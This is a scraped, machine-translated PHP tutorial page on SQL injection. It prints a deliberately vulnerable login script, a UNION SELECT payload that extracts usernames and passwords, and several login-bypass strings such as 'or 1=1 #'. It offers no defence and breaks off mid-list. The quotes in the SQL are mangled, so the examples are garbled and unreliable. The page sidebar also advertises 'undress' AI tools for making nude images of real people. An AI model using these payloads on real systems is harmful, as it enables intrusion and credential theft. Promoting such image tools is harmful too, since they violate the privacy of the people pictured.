Home Backend Development PHP Tutorial php injection 2_PHP tutorial

php injection 2_PHP tutorial

Jul 13, 2016 pm 04:54 PM
and php select union exist us Construct injection statement enter

Let’s build the injection statement
Enter
a% and 1=2 union select 1,username,3,4,5,6,7,8, password,10,11 from
alphaauthor# in the input box Put it in the sql statement and become
select * from alphadb where title like %a% and 1=2 union select
1,username,3,4,5,6,7,8, password,10,11 from alphaauthor# %
The result is as shown in Figure 17.
How about it, it’s out, haha, everything is under control.
C: Let’s take a look at various injection attack methods from the injection location
1) First let’s take a look at the background login
Code first
//login.php
.. .....
$query="select * from alphaauthor where UserName= "
.$HTTP_POST_VARS["UserName"]." and
Password= ". $HTTP_POST_VARS["Password"]." ";
$result=mysql_query($query);
$data=mysql_fetch_array($result);
if ($data)
{
echo "Backend login successful";
}
esle
{
echo "log in again";
exit;

.........
?>
Username and password are directly put into SQL for execution without any processing.
Let’s see how we can get around it?
The most classic one is still the one:
Enter
'or =
into both the username and password boxes and bring it into the sql statement to become
select * from alphaauthor where UserName= or = and Password = or =
The $data obtained in this way must be true, which means we have successfully logged in.
There are other bypass methods, the principle is the same, just find a way to make $data return true.
We can use the following methods
1.
Enter both username and password or a = a
Sql becomes
select * from alphaauthor where UserName= or a = a and Password=
or a = a
2.
Enter both username and password or 1=1 and ' =
Sql becomes
select * from alphaauthor where UserName= or 1=1 and ' =
and Password= or 1=1 and ' =
Enter both username and password or 2>1 and ' =
Sql becomes
select * from alphaauthor where UserName= or 2>1 and ' =
and Password= or 2>1 and ' =
3.
Username input or 1=1 # Enter the password as you like
Sql becomes
select * from alphaauthor where UserName = or 1=1 # and
Password= anything The following part of
is commented out, of course the return is still true.
4.

www.bkjia.comtruehttp: //www.bkjia.com/PHPjc/631789.htmlTechArticleLet’s build the injection statement. Enter a% and 1=2 union select 1,username,3,4 in the input box. ,5,6,7,8, password,10,11 from alphaauthor# Put it in the sql statement and become select * from alphadb where t...
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

AI Hentai Generator

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)
2 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
Repo: How To Revive Teammates
4 weeks ago By 尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island Adventure: How To Get Giant Seeds
3 weeks ago By 尊渡假赌尊渡假赌尊渡假赌

Hot Tools

Notepad++7.3.1

Notepad++7.3.1

Easy-to-use and free code editor

SublimeText3 Chinese version

SublimeText3 Chinese version

Chinese version, very easy to use

Zend Studio 13.0.1

Zend Studio 13.0.1

Powerful PHP integrated development environment

Dreamweaver CS6

Dreamweaver CS6

Visual web development tools

SublimeText3 Mac version

SublimeText3 Mac version

God-level code editing software (SublimeText3)

PHP 8.4 Installation and Upgrade guide for Ubuntu and Debian PHP 8.4 Installation and Upgrade guide for Ubuntu and Debian Dec 24, 2024 pm 04:42 PM

PHP 8.4 Installation and Upgrade guide for Ubuntu and Debian

CakePHP Project Configuration CakePHP Project Configuration Sep 10, 2024 pm 05:25 PM

CakePHP Project Configuration

CakePHP Date and Time CakePHP Date and Time Sep 10, 2024 pm 05:27 PM

CakePHP Date and Time

CakePHP File upload CakePHP File upload Sep 10, 2024 pm 05:27 PM

CakePHP File upload

CakePHP Routing CakePHP Routing Sep 10, 2024 pm 05:25 PM

CakePHP Routing

Discuss CakePHP Discuss CakePHP Sep 10, 2024 pm 05:28 PM

Discuss CakePHP

How To Set Up Visual Studio Code (VS Code) for PHP Development How To Set Up Visual Studio Code (VS Code) for PHP Development Dec 20, 2024 am 11:31 AM

How To Set Up Visual Studio Code (VS Code) for PHP Development

CakePHP Quick Guide CakePHP Quick Guide Sep 10, 2024 pm 05:27 PM

CakePHP Quick Guide

See all articles